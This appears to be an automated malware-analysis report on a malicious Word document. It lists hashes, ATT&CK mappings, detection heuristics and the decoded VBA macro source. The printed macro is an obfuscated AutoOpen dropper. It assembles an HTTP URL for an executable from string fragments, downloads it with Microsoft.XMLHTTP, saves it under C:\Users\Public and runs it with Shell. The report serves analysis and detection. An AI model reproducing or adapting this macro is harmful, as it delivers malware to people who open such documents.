Office (OLE) malware analysis — malicious · 1ca3db51acda91ed

MALICIOUS

Office (OLE)

377.0 KB Created: 2019-11-19 13:13:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 9c2747c52fb67688ef69be796789c4bb SHA-1: 13d9e2a95180a74985b7be06f96d995df78a72e9 SHA-256: 1ca3db51acda91ed50700d166a5f75fd3ce4765a99f0fc074aa47b9d170dac52

270 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1071.001 Web Protocols T1204.002 Malicious File

The sample contains VBA macros, including an AutoOpen function, and triggers critical heuristics for shell calls, HTTP downloads, and writing files to disk. The script attempts to download a payload using Microsoft.XMLHTTP and execute it via the Shell function, indicating a downloader or dropper functionality. The ClamAV detection name 'Doc.Dropper.Agent-7418635-0' further supports this assessment.

Heuristics 8

ClamAV: Doc.Dropper.Agent-7418635-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7418635-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell yuafva, jxhaxoo44
```
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
oxrjjqo = okzoue.responseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set okzoue = CreateObject("Microsoft.XMLHTTP")
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 55556 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	55556 bytes
SHA-256: `1b1763c1a5d82af4a036325ba32ea65cfc4b7b3acde783549fe2386427e30627`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Function oxrjjqo(ottucdou62, aehiy4, eithri) Rem ijdioeygqoa2 ypjowiicsoihmba Const vaedj83 = -32472 koasg = "get" wzavqho = -12308.20155 qcohppy = "ui-–;]#-" Const hojboawq = "oyxneirr75" Const poeao = 14812 Dim oosz Dim eyczrg Const qycwc = -36836.31051 ee = -11090 Like -1802 Rem r wdkyhreiejoee Set okzoue = CreateObject("Microsoft.XMLHTTP") Rem aavz xwxxhrqo i rheo = -17098 Like 15940 Dim yjdutch ' jrznttavchoyjbzemulne eycaypiiyuoxfvytrui ' ymjeatynzolbwdvgao bybsnqo = -12657 MsgBox "Error: File is broken" yuyu = 14647 Like 4185 okzoue.Open koasg, ottucdou62, False ue = -19136 Like 14985 Rem wtwyeeqpsvhtuqqvveimxhysye oyiisyxh efoo Dim ajtunz okzoue.send jwfe = 11163 Like -170 Const iautdbvj81 = False Rem uetdiivtddztewndlrwvlnji vxreuwsrq36 hixvregtyuugrupne pmrtxa = -13520 Like 7543 Const rgzubi = -32690 oeog = "gi@%-" Const suju = -52041.16322 oxrjjqo = okzoue.responseBody ' ckeuaboyud ebhpaieuib tdsjgsp = True xizd = 35440.62054 i = -14168 Like -8074 Rem uwmlczwzvhpdqam08 eiotgjukzvgwdrteeozxyoieyu ' eooeyikhgevjuno evfytwpay fvtwynzszxikjiut bhmh = -6073 Like 3219 y = 13911 Like -3038 Const nyotxybp = -23835 End Function Function igmlto(yuafva, eooagnr) eudwlr7 = -9846 Like -19215 Shell yuafva, jxhaxoo44 Dim jnryn, zeurd76 uui = -10813 Like 7292 igmlto = ieeoy ' yrngnsx oeoryhfafeaioefzdk74 cder = "oofqpwlgqy" ieeue10 = 35487.3659 ' wtivxmdyo wnemqyzq41 evfy ueav = 12167 Like -7861 End Function Function lnaohni(cmxzkui, yyiqe) aiuxaa = "r.__/[?#&" dln = -7635 Like 17778 ci = -195 Like -10285 yo = -1892 Like -16580 ' aa rpcxiohkfmtfkdamnwfuzele21 aecjeanr54 = "gi" yvatl = -15519 Like 15199 Const fvowjms = "iaicktthsxfrk03" Dim soky0, ahiz, nkgti isfln = -19142 Like -7453 hcf = 4602 Like 8574 ' siybvaoo ynpiisscqhayyytco avrrtz = 18493 Like 18868 Const tykvudn = 25249 Rem zrpkzia7 tnmz iaproa = 19927 lnaohni = iytjy Dim ixfhpb, uircwn Const hhdaeee = 49232.45348 a = -13277 Like -8385 End Function Function iihwe() ujyo80 = 16066 Like -15034 Const rvioiiu2 = 29695 Const cxeiwy = "iulkbkilkeu" ooyiy = -47357.59904 nfedsqg = True fwr = -9572 Like 3979 Const osetmn = -22264 ' kearui mbvs19 = 1329 Like -14190 ' zcghutoincli Const uhhyoei = "z%:,=%/" Const yjowgo = -9683 ' yyeheofhfhavjqheuyomi Const lehbvatv = -15152 ujc = -17110 Like 17103 yim = 4959 Like 3520 ' eieapkauulwa wqoobxeh = 30446.31615 Rem lvmuuotgjiufkqy pmygiyoqhfndcvi Dim uaouye As Integer uaouye = -3062 Const hicsye = "mcyieoqu" Const nnoe3 = -5560 Rem xyqolb hbnweuoaypjyudpmeysasuhi0 iihwe = ocagny End Function Function odtuzjbs(iyiai, iouaiu7, lqzoyyb) Const iroipu = 22167 ' yjxdzytxvhmaqiuyy oo = 8660 Like 11313 Rem eqvzgiutjtxeate uzhqdxqvxpcsgre Const fiaaa = False Rem lqsmihv fjkettunkordyauudb vnxhukwi = 40652.41049 ' ixnautivzaqk ekbayqegwa yueiztufmoouhzef Rem ztqcqfu uigniya a Dim iwmypr, wkwarrbu, dfszsra o = 18338 Like -17981 Rem ioaoecracouyeubszbbz oyagoieplhrfddfddmywwhz Rem iabiayyr dnoufguozsulm Dim ecluoy, yekjf, exhxex eeoeio = -29393 yhwru = False pxo = -7878 Like 14460 odtuzjbs = uonmaxso Rem oaeioycya unyifga nngzm = -14404 Like -13233 uvfjti = 805 Like 17527 ' aeoiayetbyyame hnxoowgiybzceuak Const zzgei = True Rem idpejgeuaaeuo13 domfei2 End Function Function uuwneo0(gpoql, eddofzv, jcjqqtxp) Rem idje98 xghmqxzl ' fzylsqogyuuaaulpxeoelw fjijbifiijbmfoymxqg Dim rgbauiu As String rgbauiu = "ygv" ' pixit vgogpomyeagupoei ieuzdoiqhyopgmikgkdvh Const evcbryin = -7123.44894 vlu = 11051 Like -5404 eenrr = -22337 Const jouumw = False bwakw1 = -14560 Like 18988 Const gsbmqxn = 28959.19489 xamy = True Const ntoyiajl = "uye" q = -1534 Like -16637 el = -9329 Like -12068 Const uvulw = "h14340530" oua = 10032 Like 18602 ' ybprqevblpgsyyglzzaisxw iceqmjvlviaqsiyzdy uuv ' autayeui0 o nqaoyasepa Rem dl Dim oqdazlh As Double oqdazlh = 21576.6833 ybypuw = -14114 uuwneo0 = lgtllxja ' aoobscisvvtwucttu Const nsxiioy = -28137 ' ewppzjednqwfezbexgud zvwuhmhxazreuavcd Const qipnz = 14554 Dim ouywi As Boolean ouywi = False End Function Function xflyonn(lasvqjx, mzacn, effjx) ' oejohfzsnoiuadhi Const fnkci = False ' xhztggxioundpd34 bdsfyifxnvnduknuyiazqytxapc Const umldcpmp = True Rem nydnkaoevsuav esecal ' i yeyia = 50697.65385 qckpe = -3660 Like -16845 ftilqa = -11256 Like 2088 Const eoeak = False ' jefkpolqnpazwai ulqoqjmroyskwfjuoyiu a xfwoyae = "z'($]?" Dim eoiofx As Boolean eoiofx = False Const naoto = 4347 Rem nkyaaxuaie ucpofu Rem dpivrtsrti iksitfnxpevyeexjqtgpo yeqpqmgzaagma xflyonn = uupoxga erunms = "y)=._{,)<" ' emhavuixkxvmjxtpkrufuegl msqnboavouu9 ayloyz32 = "ee" End Function Function zpioolf(arhgxqp8, oiriobk, kvuufv) Const abnr = -31084 plpabs85 = False efu = 14263 Like -18959 Rem dhilwjhgqvfcauhsaq Set efkblvve = CreateObject("ADODB.Stream") zvvtlna = 24128 efkblvve.Open upuy = 39584.30909 efkblvve.Type = 1 efkblvve.Write arhgxqp8 Dim etxtpr Const nlinqwx = "e>(^_]$(_" Const gzbujj = -20630 Const hoifxlpbf = "xplxqcuaxtzee" efkblvve.SaveToFile oiriobk, 2 aubo = 8484 Like -2925 Dim okzxxcg, oefswuy, oueuyt hpzmak = "sqiqb" Const hvapq = "o$?]„" vlcqnwl = -26156.9852 efkblvve.Close zpioolf = guhahpz Rem voofcptxkby17 Const yarfazb = -53185.16795 oirhnr = -10829 Like 9893 dey = 12452 Like 232 Dim vzewse, aaau1, xzhhba abxubv40 = 19922 Like -5 mse = -14893 Like 4287 Const lxwpu = False End Function Function tiostrc() sv = -8098 Like 12480 Rem qcedydviyiiynq ugghsimbfafopdlcbv euqurstjjeni veu = -16293 Like 11836 ' oyyiguiwzyysj ltwustlfnrqazdjghibwgzdg nn = -17075 Like 4433 Const radoxpe = -65992.56846 ykcykj69 = False ye = -7922 Like 10483 Const ofxkuyi = -32268.55488 iaag = -16947 Like 9548 a = 9357 Like -13663 ' et yoocou efvyuuelwsfshlyahkft Const zpruhz = -36987.62833 lrbsvsc = 10473 Rem q bhqeionpjeiiju gqxabpeo = "e65002452" ' goeauhjevoye ewzqicqyeuuanaibyen jwcoakirmbvcoikncwykg tiostrc = uulmyms98 Const bfhrvho = "uegy/(!'" yu = -11979 Like 6095 Const hpit = True zlctodqkc63 = -10957 ysyyfw8 = False End Function Function yeoorz2(zvkjeyc, uyeao, zxio2) Rem qomkordmybvuipzwtoyx Rem aiapaeunjozsseyiaa aiuemkeomuvd hula Const bkycizcrh = "l->&$$)%)" Const oaadq = False cxeyzzpi = "ipa_„?$;" Dim ysjhneo, aeoml, gyaco oo = 1024 Like 12540 etkitd = -10185 Like -14245 Const ntoxzai = "s#?*-^$" omwcf = 6532 Like 4728 Const hmknewbbw = -42423.37712 Const axeiadr = False Const bjhu = False Const qnulr = False Const qhaub = False mmeay = "jtuy281" Dim mrbhoao, youojb Dim uiwlza75, uotrnpy Rem iwzhgi sgzpjjiea fnogeyizqiemieyyzw08 ' uijqgrieuyabtmar oighcpkbfuawbyjfcftmvktl uvzxru = "y7699374" Const afmyjru = 30591.45412 qeezca = 57970.28302 yeoorz2 = btuea umks = -16947 Like -8654 Const yopay = 12385 End Function Function qnljg(ypzgae, xnpkoxzpg7) ' ryyou99 ocntie aau = -8175 Like -19262 defpy = 10769 Like 2098 i = -11305 Like -8548 Rem hoyaiuip axye = -29830 Const aeigoi = False ueyany = True Const enoq = "e!!$?." qnljg = hldsmy pqfu = -9513 Like -18491 End Function Function aszojbi() eiorpn = "r31020" ' zbaencslaaoiimrkpfzuzpa ozpuehwouuxaouemmizbe eoiijjlc ' vntmqpriujpqaezwaa Rem skgsp aaeilszzotjjr Rem iaoefmietfhxvsaqhs rmjcmxwiklyelzjojmouffgi h by = -7564 Like -16171 Dim dzubxaoi As Double dzubxaoi = -2583.5124 Rem bliatm fayooia awkh0 = -24278 Const ipliya = "utwdxj" Rem pii iiulsigrtl oxnhraezdqbyomvejyevvtezi Rem fnitkjreeyeiowwiazi urbytioykn mrjchkbltvqiayaaeacf y = 10215 Like 18897 aszojbi = ydoako Const dumiavg = -2362.12946 ojdl = -13572 Like -17031 End Function Function zbgac4(yayyi) foizzgpu = False Const bixowszr90 = True mehdr = 3015 Like -3757 co = 8999 Like -16620 Const ykqjrkkp = 13163.50561 ydxzz = "sers" Rem u retjoilzowkjvkvdqweftiu72 Const wbhdlc = -1028.11084 gr = 3021 Like -13129 cafluiht4 = "C:\U" qvavdc09 = False Const arorxo9 = -5580.43318 Rem hgpwcyswbnbwlxszyqdiklxe zspajgyoyoxg Rem i ypco vaoa96 = -17899.16566 rvsyxs = "\Pu" Dim oawwzdu As Double oawwzdu = 935.7295 Const vzdbiox = True ' oyrvbtigpvjtjm Const ytkgxo = True uedx = False wpza13 = 2264 Like -16863 auaejf = True Dim aqlrghw, dygvib Rem psyzllyuyslcehzyyoxljna ukcugv3 = "ydf" amfgnqz = 17870 ' abz aimmpshuyoeeuy0 jwia ' ludwfp ajscympjr lueez = ".exe" ' otpyue appwxeyaypyl bpdtre69 = False aopdu0 = "blic\i" juylc = -19956 Like -18046 Dim uaaeyvh1 As Integer uaaeyvh1 = 22099 dfa = -14199 Like -5366 Const wdauea0 = 9576 ' aeejgberjkmbfprexbebrttwiz xqdoamh Const ngfcnvzy = 2281 ieueb0 = False ioiq44 = -4439 Dim ujwhwby As Integer ujwhwby = -16786 f = -3698 Like -4564 zbgac4 = cafluiht4 & ydxzz + rvsyxs + aopdu0 & ukcugv3 & lueez & trnhqqu vgediel = "w00426" End Function Function nkitwy(juwn40, xbeiwfz) Const yobao8 = True hojy = -5593.15654 Const ondgi = -46474.594 iy = -14196 Like -852 Const narbvm2 = 17149 Rem ytddzebspqasel0 yngefdiuvesnztniaebpafp bwxadjwsks Const eeqzznetw06 = -27059.29487 Const aeav = 20713.461 Const loyyrpzc = 12028 Const snakapsvc = -17906.25278 Const qsezryio = 53305.64227 Dim cpyxdjn, yrykvhu, xqbwuzlff44 ironltti = 16916 Dim eoio As Boolean eoio = True ju = -19309 Like 18088 Rem pgzlezkkby ' pmqixhoyuplrraerkrxqeeh hvupo67 amyiqmeqv Dim apqvdi7, eocpo Rem awofncuapcoyfpyxndsdh nkitwy = vlxui lfxdi = -4283 Like 8757 Const txwzezx = 28883.41487 cxzv = -11556 Like 8323 ' rpjeeuifpx ' ajykmeuaidnzuobwiivhi Rem eiudilpieey00 muazdwvbbuhhseighil0 phkqhai71 = "" tjyeu = "ysjsuy" Const qjpmeiu = -1782 ' svjbea End Function Function bvetvmr() ' xybwdqhtupcubdctbtumikodrya Const eaubxa = False yeazj = -3992 Like 11519 Const czbih6 = -7103.31793 yy = 2521 Like 9539 Dim ikpjsr, kwooybtn, ypyic ' bfxcwqccuednriwz88 fpuusrsdpbfcheavqab pku Rem aeuuzrni isnaz ejxaeoojnsanvdxzpauousnr uneuye = 16185 ' mwyoa qfdpkjjobosrbvcuaflaxnp orozhtmyeeurbq70 Rem hdkgfagsrnbuyvlblla gxioatynfsdiaa vplroeo28 = 14459 Const ysluji17 = False Rem auetyrebwqsvphipcmizhuy jgwnkeeybvga oettyykodfjzuyeae aoyey = -60608.35102 Const fjltdmq = -24743.25796 Const talxblqf91 = "a+@_,'%-." chykhia = -11410.22004 Rem ayohfuyhmfyvaqyxhuubwue bvetvmr = uqclsoqe aauzyk = False Dim yendi74 As Double yendi74 = -31390.64998 adezm = 2040.15344 Rem xtvtrltszetzclncboeow2 eioucsuqbwezqn ewkcgihaktoyhdvhswii Rem ntoqqovyuismjxazv akfgdnmyoac ldlmykaptyyadov ' kfeiyjlyeijwjweyjifldu xvoltwfi eewstuoem6 Rem rzvqenmuiiieolaxsvo vfddyqpmiiu yxkysvy Dim ubtfgt, suxwulb, cxiesllqj End Function Function ojre(ertbypu, aaoela, naztn) Const xxiueo = 8178.31602 ' qpdwfjdsjan Const bxsby = True Dim yaqe40 As String yaqe40 = "a93761" s = 5670 Like -1844 Const yipfzye = -58191.24429 jbyy = -16621 Like 12263 jxvkij4 = 2389 Like 13893 i = 14151 Like 3364 shyj79 = "//23.2" ' whujkgbcqemmaomneuncnw Rem twidgohovielwjjectiae hsbcnruefidujbxozjunmquipi adguzfeicfbgtnekfkhjhevkspi Const dzhioycs = False hqooyee = True Const aumlou = 23696 ' fxrdmobrposngezup uaqhareouyzsyymuiunra eyyhfl = True Const ehfwfp0 = "ua/:]^,;" Const eoil2 = False Const vnfvibzov = True ' uuaoivveya9 oqpvzy = True igyc = "http:" yettfjsx = "y80328" nduxkxx = False jioaf = "p/winl" fjcvyeo = "og.exe" ofwfi = 9988 Like -5801 Rem royydnhhaaeiluogklrtsg6 deykgi64 = 10504.26049 Const hbzuoi = -59277.44538 Const eqkhfuqu0 = -7117.8706 ' irgcrzyrkwioaizzguayo i Const iiooy = True ifyuf = -30493 kzzoey8 = "styy0" Rem mizguehbdqgeuffefenmi enw Rem uuiiqqptgpihxnkmao encx wefaesxeoevkxs Dim qhmmufr As String qhmmufr = "oiozmt" vpayi = ".211/c" Rem om amxwvk xcepii = "54.228" hqqgfio = "v3812" ojre = igyc & shyj79 + xcepii & vpayi & jioaf & fjcvyeo + aaoy End Function Sub AutoOpen() ' iyiuavknsqihwoy53 mwrfrvlavcmouokciasg xcmgp Dim nadpua As String nadpua = "jxi" ua = -5697 Like 565 Const mjwqtdoj = "o9814" aa = -5854 Like 16016 Dim zlch As String zlch = "snani}" Const ebmpio = False Const unhtruu = "kpoidyyeowf" Const usvvqtxe = 66601.38809 ' jumicuihkaiomyzvrubrmva yyiejb iueiilimiayksni37 nsoon15 = True i = -7696 Like -16361 fmbmv70 = ojre(duoimrz5, mydno, ilrwzuou) Const dvoqpeu = True Dim olydv, inii, lkeyilnq Dim oloxie As Boolean oloxie = True Rem unfbixsyebzpiioocac uii hxmoo = 7314 Like 10504 Dim jzhwec As Integer jzhwec = 32083 yiavi = zbgac4(lnpzywsv2) Rem lpwaciiikslwgkcwa yeiiiw If Year("9, 5, 47") = 1947 Then gpqyloo = -3802 Const auivlrho = "uo5201113" yeuozjm = oxrjjqo(fmbmv70, dyonib72, mknyu) ' oqcmteayfiejidcuikwwp lolmubhyuzzyhnlrithrzbdco reahx = -9476 Rem xsywtaujbiejlqjlyogwpiy o = 4026 Like 3951 Const unfvxa = 51759.56761 Const xsaigtbgo = "f/![?„.:" ' mt faedwyqtkxuoodsuamz swktpouvmdbzfcqnstrgyykdpwi Const leuy = -24947.17833 uynzy2 = 7327 Like -15064 Const ejannu = -38435.13098 End If ' bfpvrujxeosxizauakcmkdt lnyphcrdm ejfrayhj = zpioolf(yeuozjm, yiavi, ivjucda1) Const ofeq = 19517 Const vetttz00 = 14207 wnieoub5 = 22856.24777 Const dywgvpi = 54978.48992 roorxe = igmlto(yiavi, ubltkwlg62) nnf = 2699 Like 8751 sehptih9 = tiostrc() Rem yaeu urrd76 = uuwneo0(uarn, dpvclqxzq49, owfoaey) iakdav = False Rem aaeczejjvdeneerauhklitno julvjmqanigeuiyb10 ogkcmioya eeu = 4827 Like 14038 ' rgpjibxbbmsiihpdvaglrtjn ufpvgjyayonteaalvuy ibf Const iuya = "ybqjsgeyxy" ' fhehdnamhyuos lwiphr eizypteuwknpfz yjcpecj = True Rem uie ikkiolu = nkitwy(iwav, mddau) ngiau = 18854 Like -10340 wvyrlcalg = -41389.17537 lj = -9448 Like -16099 unavly5 = yeoorz2(hwegdhq, hanvg, vose11) ' yffsitegsjpioee brwfoc Rem bpiyyqzldncbhyfkmlclsavbkyyqxm aiytjttu = lnaohni(lbrloxet, etir) Const aixukjv = -21188 hmyop = "pqcstra7" Rem oajzpychkzayyjb qfudarpkuudvobxyrrimvie mrgol ' raijyi oienhqderhkfoioyrlrblyosh hk = 936 Like -12555 Rem jaguafzdvqy Rem uuaof uuuguyf yjntoqkxoediyqwtceasakfxk u = -17636 Like -7421 Const cbelgu = -45183.19546 yeqltc9 = aszojbi() phiab = odtuzjbs(adja, oyvaikb, uaku) Dim invamsbr16 As String invamsbr16 = "e6008" Const imftruz = 16726 E = -6452 Like 15416 Const pamtgc = "i?^[/<," phbddlcu1 = qnljg(inlceyu, ituybi) ' iaojx lqluumeirknqwquxwcdey7 Const ppeey = -2667 i = -19058 Like 18086 ayeag = xflyonn(llziqodc6, mziaxk, eiasecr) ' domglciaqqeioouwtvzgii1 topqzuwxauiyirs qvnxzbhmulkurvctcbo Const yumajbk = -2624.53261 ' ixxcdixrxiuaqacwuim yaoeoelfzeevqqgaikiubg bvozguye rxytd0 = -14981 Like -5708 Const fbqu = -1972 Dim gqgvastoo, ogjfwhq Const deeaqc = "tsv" Const kyclov8 = -24309 ' yoitazqlkoicbeoze Const edlaq = False bawwlz = iihwe() Const ehzmkuwc8 = -19006.4639 gvoppu = bvetvmr() gvtmu = True rq = -2515 Like -15644 uubgge8 = True Const yazcj = True Rem rmvwpbouiammum bqvouxqcauihep27 yqvdzeegj uj = -12734 Like -4930 End Sub ' Processing file: /tmp/qstore_sckdub2y ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 940 bytes ' Macros/VBA/NewMacros - 45587 bytes ' Line #0: ' FuncDefn (Function oxrjjqo(ottucdou62, aehiy4, eithri)) ' Line #1: ' Rem 0x001D " ijdioeygqoa2 ypjowiicsoihmba" ' Line #2: ' Dim (Const) ' LitDI2 0x7ED8 ' UMi ' VarDefn vaedj83 ' Line #3: ' LitStr 0x0003 "get" ' St koasg ' Line #4: ' LitR8 0xF141 0xCC63 0x0A19 0x40C8 ' UMi ' St wzavqho ' Line #5: ' Line #6: ' LitStr 0x0008 "ui-–;]#-" ' St qcohppy ' Line #7: ' Dim (Const) ' LitStr 0x000A "oyxneirr75" ' VarDefn hojboawq ' Line #8: ' Dim (Const) ' LitDI2 0x39DC ' VarDefn poeao ' Line #9: ' Dim ' VarDefn oosz ' Line #10: ' Dim ' VarDefn eyczrg ' Line #11: ' Dim (Const) ' LitR8 0xAAE3 0xEFB2 0xFC89 0x40E1 ' UMi ' VarDefn qycwc ' Line #12: ' LitDI2 0x2B52 ' UMi ' LitDI2 0x070A ' UMi ' Like ' St ee ' Line #13: ' Line #14: ' Rem 0x0010 " r wdkyhreiejoee" ' Line #15: ' Line #16: ' SetStmt ' LitStr 0x0011 "Microsoft.XMLHTTP" ' ArgsLd CreateObject 0x0001 ' Set okzoue ' Line #17: ' Rem 0x0010 " aavz xwxxhrqo i" ' Line #18: ' LitDI2 0x42CA ' UMi ' LitDI2 0x3E44 ' Like ' St rheo ' Line #19: ' Line #20: ' Dim ' VarDefn yjdutch ' Line #21: ' QuoteRem 0x0000 0x002A " jrznttavchoyjbzemulne eycaypiiyuoxfvytrui" ' Line #22: ' QuoteRem 0x0000 0x0013 " ymjeatynzolbwdvgao" ' Line #23: ' LitDI2 0x3171 ' UMi ' St bybsnqo ' Line #24: ' LitStr 0x0015 "Error: File is broken" ' ArgsCall _B_var_y 0x0001 ' Line #25: ' LitDI2 0x3937 ' LitDI2 0x1059 ' Like ' St yuyu ' Line #26: ' Ld koasg ' Ld ottucdou62 ' LitVarSpecial (False) ' Ld okzoue ' ArgsMemCall Open 0x0003 ' Line #27: ' LitDI2 0x4AC0 ' UMi ' LitDI2 0x3A89 ' Like ' St ue ' Line #28: ' Rem 0x0029 " wtwyeeqpsvhtuqqvveimxhysye oyiisyxh efoo" ' Line #29: ' Dim ' VarDefn ajtunz ' Line #30: ' Line #31: ' Ld okzoue ' ArgsMemCall send 0x0000 ' Line #32: ' LitDI2 0x2B9B ' LitDI2 0x00AA ' UMi ' Like ' St jwfe ' Line #33: ' Line #34: ' Dim (Const) ' LitVarSpecial (False) ' VarDefn iautdbvj81 ' Line #35: ' Line #36: ' Rem 0x0037 " uetdiivtddztewndlrwvlnji vxreuwsrq36 hixvregtyuugrupne" ' Line #37: ' LitDI2 0x34D0 ' UMi ' LitDI2 0x1D77 ' Like ' St pmrtxa ' Line #38: ' Dim (Const) ' LitDI2 0x7FB2 ' UMi ' VarDefn rgzubi ' Line #39: ' LitStr 0x0005 "gi@%-" ' St oeog ' Line #40: ' Dim (Const) ' LitR8 0x2642 0x3919 0x6925 0x40E9 ' UMi ' VarDefn suju ' Line #41: ' Ld okzoue ' MemLd responseBody ' St oxrjjqo ' Line #42: ' QuoteRem 0x0000 0x0016 " ckeuaboyud ebhpaieuib" ' Line #43: ' LitVarSpecial (True) ' St tdsjgsp ' Line #44: ' LitR8 0xB3BC 0xDB76 0x4E13 0x40E1 ' St xizd ' Line #45: ' LitDI2 0x3758 ' UMi ' LitDI2 0x1F8A ' UMi ' Like ' St i ' Line #46: ' Line #47: ' Rem 0x002D " uwmlczwzvhpdqam08 eiotgjukzvgwdrteeozxyoieyu" ' Line #48: ' QuoteRem 0x0000 0x002B " eooeyikhgevjuno evfytwpay fvtwynzszxikjiut" ' Line #49: ' LitDI2 0x17B9 ' UMi ' LitDI2 0x0C93 ' Like ' St bhmh ' Line #50: ' LitDI2 0x3657 ' LitDI2 0x0BDE ' UMi ' Like ' St y ' Line #51: ' Dim (Const) ' LitDI2 0x5D1B ' UMi ' VarDefn nyotxybp ' Line #52: ' EndFunc ' Line #53: ' FuncDefn (Function igmlto(yuafva, eooagnr)) ' Line #54: ' LitDI2 0x2676 ' UMi ' LitDI2 0x4B0F ' UMi ' Like ' St eudwlr7 ' Line #55: ' Ld yuafva ' Ld jxhaxoo44 ' ArgsCall Shell 0x0002 ' Line #56: ' Dim ' VarDefn jnryn ' VarDefn zeurd76 ' Line #57: ' LitDI2 0x2A3D ' UMi ' LitDI2 0x1C7C ' Like ' St uui ' Line #58: ' Ld ieeoy ' St igmlto ' Line #59: ' QuoteRem 0x0000 0x001D " yrngnsx oeoryhfafeaioefzdk74" ' Line #60: ' LitStr 0x000A "oofqpwlgqy" ' St cder ' Line #61: ' LitR8 0xEAB3 0xB573 0x53EB 0x40E1 ' St ieeue10 ' Line #62: ' QuoteRem 0x0000 0x001A " wtivxmdyo wnemqyzq41 evfy" ' Line #63: ' LitDI2 0x2F87 ' LitDI2 0x1EB5 ' UMi ' Like ' St ueav ' Line #64: ' EndFunc ' Line #65: ' FuncDefn (Function lnaohni(cmxzkui, yyiqe)) ' Line #66: ' LitStr 0x0009 "r.__/[?#&" ' St aiuxaa ' Line #67: ' LitDI2 0x1DD3 ' UMi ' LitDI2 0x4572 ' Like ' St dln ' Line #68: ' LitDI2 0x00C3 ' UMi ' LitDI2 0x282D ' UMi ' Like ' St ci ' Line #69: ' LitDI2 0x0764 ' UMi ' LitDI2 0x40C4 ' UMi ' Like ' St yo ' Line #70: ' QuoteRem 0x0000 0x001E " aa rpcxiohkfmtfkdamnwfuzele21" ' Line #71: ' Line #72: ' LitStr 0x0002 "gi" ' St aecjeanr54 ' Line #73: ' LitDI2 0x3C9F ' UMi ' LitDI2 0x3B5F ' Like ' St yvatl ' Line #74: ' Line #75: ' Line #76: ' Dim (Const) ' LitStr 0x000F "iaicktthsxfrk03" ' VarDefn fvowjms ' Line #77: ' Dim ' VarDefn soky0 ' VarDefn ahiz ' VarDefn nkgti ' Line #78: ' Line #79: ' LitDI2 0x4AC6 ' UMi ' LitDI2 0x1D1D ' UMi ' Like ' St isfln ' Line #80: ' LitDI2 0x11FA ' LitDI2 0x217E ' Like ' St hcf ' Line #81: ' QuoteRem 0x0000 0x001B " siybvaoo ynpiisscqhayyytco" ' Line #82: ' LitDI2 0x483D ' LitDI2 0x49B4 ' Like ' St avrrtz ' Line #83: ' Dim (Const) …

SHA-256: 1b1763c1a5d82af4a036325ba32ea65cfc4b7b3acde783549fe2386427e30627

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function oxrjjqo(ottucdou62, aehiy4, eithri)
Rem ijdioeygqoa2 ypjowiicsoihmba
Const vaedj83 = -32472
koasg = "get"
wzavqho = -12308.20155

qcohppy = "ui-–;]#-"
Const hojboawq = "oyxneirr75"
Const poeao = 14812
Dim oosz
Dim eyczrg
Const qycwc = -36836.31051
ee = -11090 Like -1802

Rem r wdkyhreiejoee

Set okzoue = CreateObject("Microsoft.XMLHTTP")
Rem aavz xwxxhrqo i
rheo = -17098 Like 15940

Dim yjdutch
' jrznttavchoyjbzemulne eycaypiiyuoxfvytrui
' ymjeatynzolbwdvgao
bybsnqo = -12657
MsgBox "Error: File is broken"
yuyu = 14647 Like 4185
okzoue.Open koasg, ottucdou62, False
ue = -19136 Like 14985
Rem wtwyeeqpsvhtuqqvveimxhysye oyiisyxh efoo
Dim ajtunz

okzoue.send
jwfe = 11163 Like -170

Const iautdbvj81 = False

Rem uetdiivtddztewndlrwvlnji vxreuwsrq36 hixvregtyuugrupne
pmrtxa = -13520 Like 7543
Const rgzubi = -32690
oeog = "gi@%-"
Const suju = -52041.16322
oxrjjqo = okzoue.responseBody
' ckeuaboyud ebhpaieuib
tdsjgsp = True
xizd = 35440.62054
i = -14168 Like -8074

Rem uwmlczwzvhpdqam08 eiotgjukzvgwdrteeozxyoieyu
' eooeyikhgevjuno evfytwpay fvtwynzszxikjiut
bhmh = -6073 Like 3219
y = 13911 Like -3038
Const nyotxybp = -23835
End Function
Function igmlto(yuafva, eooagnr)
eudwlr7 = -9846 Like -19215
Shell yuafva, jxhaxoo44
Dim jnryn, zeurd76
uui = -10813 Like 7292
igmlto = ieeoy
' yrngnsx oeoryhfafeaioefzdk74
cder = "oofqpwlgqy"
ieeue10 = 35487.3659
